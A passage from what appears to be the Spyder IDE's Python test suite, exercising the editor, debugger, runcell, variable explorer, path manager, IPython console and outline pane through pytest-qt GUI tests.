def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
# Reach the 'name' input
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.get_focus_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
# --- Path manager
# ----------------------------------------------------------------------------
@pytest.mark.slow
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
Check that pdb notify spyder doesn't call
QApplication.processEvents(). If it does there might be keystoke leakage.
see #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
Check that pdb notify Spyder only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ is "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing is behaving strangly on windows, only some
# situations will work. This is one of these situations so it shouldn't
# be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.get_focus_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
# Here we use "waitUntil" because `shell.executed` is emitted twice
# One at the beginning of the file, and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_client('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
(0, 'initialize'),
(1, 'initialized'),
(2, 'workspace/didChangeConfiguration'),
(3, 'workspace/didChangeWorkspaceFolders'),
(4, 'textDocument/didOpen'),
]
assert python_client['instance']._requests[:5] == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('main', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert CONF.get('main', 'show_tour_message')
main_window.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(main_window.tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(main_window.tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not main_window.tour_dialog.isVisible(),
timeout=2000)
assert not CONF.get('main', 'show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
main_window.show_tour_message()
qtbot.wait(2000)
assert not main_window.tour_dialog.isVisible()
# Ensure that it opens again with force=True
main_window.show_tour_message(force=True)
qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(main_window.tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: main_window.tour.is_running, timeout=9000)
assert not main_window.tour_dialog.isVisible()
assert not CONF.get('main', 'show_tour_message')
# Close the tour
main_window.tour.close_tour()
qtbot.waitUntil(lambda: not main_window.tour.is_running, timeout=9000)
main_window.tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer._toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.explorer.treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Assert all Python editors are filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) > 0
for editor in editors_py
]
)
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
# Select file with no outline in splitted editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.explorer.loading_widget.isSpinning()
# Set one file as session without projects
